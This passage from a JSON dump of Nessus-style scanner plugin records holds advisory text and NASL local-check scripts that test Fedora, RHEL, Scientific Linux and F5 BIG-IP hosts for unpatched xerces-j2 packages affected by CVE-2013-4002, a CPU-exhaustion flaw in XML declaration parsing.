script_id(77791);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10617\");\n\n script_name(english:\"Fedora 21 : xerces-j2-2.11.0-22.fc21 (2014-10617)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138478.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9f248330\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"xerces-j2-2.11.0-22.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:53:47", "bulletinFamily": "scanner", "description": "Updated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2014-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/77979", "published": "2014-09-30T00:00:00", "title": "RHEL 6 / 7 : xerces-j2 (RHSA-2014:1319)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1319. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77979);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:38\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"RHEL 6 / 7 : xerces-j2 (RHSA-2014:1319)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4002\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1319\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-2.11.0-17.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-demo-2.11.0-17.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-javadoc-2.11.0-17.el7_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-debuginfo / xerces-j2-demo / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T09:13:22", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nApplications using the Xerces-J must be restarted for this update to\ntake effect.", "modified": "2019-12-02T00:00:00", "id": "SL_20140929_XERCES_J2_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77981", "published": "2014-09-30T00:00:00", "title": "Scientific Linux Security Update : xerces-j2 on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77981);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2013-4002\");\n\n script_name(english:\"Scientific Linux Security Update : xerces-j2 on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nApplications using the Xerces-J must be restarted for this update to\ntake effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=2369\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca3c8199\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10626.NASL", "href": "https://www.tenable.com/plugins/nessus/77867", "published": "2014-09-26T00:00:00", "title": "Fedora 20 : xerces-j2-2.11.0-17.fc20 (2014-10626)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10626.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77867);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10626\");\n\n script_name(english:\"Fedora 20 : xerces-j2-2.11.0-17.fc20 (2014-10626)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138667.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?873a7760\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"xerces-j2-2.11.0-17.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:02:23", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM\nJava 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6,\nand 7 before 7 SR5 allows remote attackers to affect availability via\nunknown vectors.", "modified": "2019-12-02T00:00:00", "id": "F5_BIGIP_SOL16872.NASL", "href": "https://www.tenable.com/plugins/nessus/85918", "published": "2015-09-14T00:00:00", "title": "F5 Networks BIG-IP : Java Runtime Environment vulnerability (SOL16872)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL16872.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85918);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n\n script_name(english:\"F5 Networks BIG-IP : Java Runtime Environment vulnerability (SOL16872)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM\nJava 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6,\nand 7 before 7 SR5 allows remote attackers to affect availability via\nunknown vectors.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL16872.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( 